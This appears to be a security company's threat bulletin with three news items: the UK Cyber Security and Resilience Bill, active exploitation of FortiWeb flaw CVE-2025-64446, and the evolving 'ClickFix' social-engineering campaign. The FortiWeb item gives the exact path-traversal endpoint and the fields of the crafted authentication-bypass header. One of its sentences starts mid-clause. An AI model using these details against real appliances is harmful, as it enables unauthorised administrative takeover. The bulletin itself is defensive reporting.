UK Introduces Landmark Legislation to Fortify Cyber-Defences of Critical Infrastructure
On 12 November 2025, the United Kingdom government unveiled a sweeping legislative package aimed at bolstering the cybersecurity of its most vital national services. The Cyber Security and Resilience Bill, announced by the Department for Science, Innovation and Technology, represents a major reform of the existing regulatory regime for critical infrastructure. It builds on the foundation of the Network and Information Systems (NIS) Regulations 2018 and is designed to protect essential sectors such as healthcare, energy, water and transport from escalating cyber-threats.
A central pillar of the Bill is the imposition of mandatory security standards on medium and large service providers that deliver IT management, helpdesk and cybersecurity services to critical national infrastructure. For the first time, these managed-service providers will be required to develop robust incident-response plans and to report “significant cyber incidents” promptly to both the National Cyber Security Centre (NCSC) and the appropriate regulator — within 24 hours for initial notice, and with a full written report due within 72 hours. Furthermore, regulators will gain the power to formally designate key subcontractors and suppliers — for example, medical diagnostic firms or chemical suppliers for water utilities — as “critical suppliers”, making them subject to the same rigorous security obligations.
Under the proposed legislation, the Secretary of State will also receive new powers to issue directives to organisations and regulators in the name of national security. This could include compelling regulated entities, such as NHS trusts or major utility companies, to enhance system monitoring, segregate parts of their networks or take other protective steps when a cyber threat is judged to be serious enough. The Bill additionally proposes turnover-based penalties for non-compliance, thereby making cyber resilience a financial imperative rather than a discretionary cost. New provisions extend the regulatory framework to encompass data centres and emerging technology infrastructure, notably including entities that manage smart energy services such as electric vehicle charging stations.
The rationale behind this legislative push is grounded in fresh, independent research that estimates the average “significant cyberattack” in the UK now costs in excess of £190,000, with the total economic impact adding up to approximately £14.7 billion annually — roughly half a percent of the UK’s GDP. One particularly stark example referenced by the government is a cyber-attack on Jaguar Land Rover: that breach reportedly forced the company to shut down systems and resulted in losses of at least £1.9 billion, making it arguably the costliest single incident in British cyber history. To further underline the stakes, the Office for Budget Responsibility has projected that a serious attack on the country’s critical infrastructure could lead to a temporary increase in government borrowing by more than £30 billion.
To Conclude, the Cyber Security and Resilience Bill marks a significant pivot in the UK’s approach to digital security, broadening the regulatory net to include a wider range of suppliers, strengthening the tools available to government and regulators, and introducing financial incentives to comply. If enacted, it will likely set a new standard for how modern economies defend themselves in an increasingly hostile cyber environment.
References:
- New UK laws to strengthen critical infrastructure cyber defenses
- Cyber Security and Resilience Bill – GOV.UK
- UK Government Finally Introduces Cyber Security and Resilience Bill – Infosecurity Magazine
Critical FortiWeb Vulnerability Actively Exploited: Attackers Creating Admin Accounts
Security researchers have raised the alarm over a serious authentication bypass vulnerability in Fortinet’s FortiWeb Web Application Firewall (WAF) that is actively being abused in the wild. The flaw, now tracked as CVE‑2025‑64446, allows remote, unauthenticated attackers to create privileged administrator accounts on affected devices. The exploitation has been observed since early October 2025, and its impact is considerable.
the FortiWeb management backend by sending a malicious HTTP POST request to a CGI endpoint. Specifically, they leverage a path traversal bug in the endpoint /api/v2.0/cmdb/system/admin%3F/../../../../../cgi‑bin/fwbcgi to reach a binary called fwbcgi. Once accessed, the exploit uses a crafted CGIINFO header containing Base64‑encoded JSON data to bypass authentication and impersonate administrative users.
Further technical analysis by watchTowr Labs reveals that this vulnerability is compounded by weaknesses in how FortiWeb handles the fwbcgi binary’s authentication mechanism. The attacker’s JSON payload must define four fields—username, profname, vdom, and loginname—which correspond to the built-in “admin” account by default. By supplying the correct values, attackers can effectively assume the identity of a fully privileged administrator and execute arbitrary administrative commands. This authentication bypass is particularly alarming because it grants full administrative control without needing to authenticate legitimately. The attackers reportedly use the vulnerability to create new admin-level accounts, thereby establishing persistent access to the compromised appliance.
Fortinet has since addressed the vulnerability in FortiWeb version 8.0.2, which patches the issue. The flaw affects earlier versions across multiple release lines: 8.0.0–8.0.1, 7.6.0–7.6.4, 7.4.0–7.4.9 and 7.2.0–7.2.11. Organisations that have not yet upgraded to a safe version are strongly urged to do so without delay. Additionally, as a temporary mitigation, users are advised to disable HTTP/HTTPS access on any publicly facing FortiWeb management interface. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE‑2025‑64446 to its Known Exploited Vulnerabilities (KEV) catalogue, urging immediate remediation.
References:
- Fortinet FortiWeb Flaw Actively Exploited in the Wild Before Company’s Silent Patch
- CISA Adds One Known Exploited Vulnerability to Catalog | CISA
- Unauthenticated Authentication Bypass in Fortinet FortiWeb (CVE-2025-64446) Exploited in the Wild | Qualys
Evolving Threats: The “ClickFix” Malware Campaign Adapts to Multi‑OS Environments
A notable escalation has emerged in the realm of browser‑based social‑engineering campaigns with the evolution of the malware campaign known as “ClickFix”. Security researchers at Push Security have observed that this threat actor has refined its techniques by expanding support across multiple operating systems and incorporating video tutorials, thereby enhancing its capacity to deceive users. This shift signals a departure from the more traditional text‑based instruction pages towards a more convincing, multimedia approach that capitalises on urgency and user familiarity with online verification steps.
At the core of a ClickFix attack is the exploitation of trust: a user is directed to what appears to be a legitimate verification or software correction page—commonly disguised as a CAPTCHA challenge or identity check. Once the user has landed on the page, the campaign dynamically detects the operating system in use and presents instructions accordingly. For example, if the target is using Windows, macOS or Linux, the commands offered will differ to match that environment. Compounding the deception, a countdown timer is activated—typically of one minute—designed to pressure the recipient into rapid action, minimizing deliberation and increasing the likelihood of executing commands without due caution. Moreover, a “users verified in the last hour” counter is displayed to further suggest legitimacy by simulating high‑volume, normal behaviour.
The sophistication of the scheme is further illustrated by its inclusion of an embedded video tutorial rather than mere text instructions. This not only makes the instruction set appear more professional but also helps reduce the risk of user error by automating the copy‑to‑clipboard of malicious commands via JavaScript. In many cases, the commands will download and execute a payload—typically an information‑stealer or similar type of malware. The operator may exploit known vulnerabilities in legitimate websites (for example outdated WordPress plug‑ins) to inject malicious JavaScript, or employ search‑engine poisoning to get the malicious page ranked prominently in results. The campaign’s adaptability is further underscored by its ability to deliver different payloads depending on the user’s operating system, ranging from MSHTA executables and PowerShell scripts on Windows to other living‑off‑the‑land binaries on Linux or macOS platforms.
In conclusion, the ClickFix campaign represents a significant advance in social‑engineering and malware‑delivery methods: by combining multi‑OS targeting, user‑friendly video guides and real‑time pressure mechanisms, the threat operators raise the bar for deception. As such, the campaign underscores the persistent need for user awareness, tight control over web‑based command execution requests and diligent web‑defence practices for modern enterprises and individuals alike.
References:
- ClickFix malware attacks evolve with multi-OS support, video tutorials
- The most advanced ClickFix yet?
Get Norm’s threat bulletin direct to your inbox
Norm tracks and monitors the latest security trends and cyber threats and collates these into a fortnightly threat bulletin.
You can receive this bulletin for free, every fortnight, by entering your business email address below:
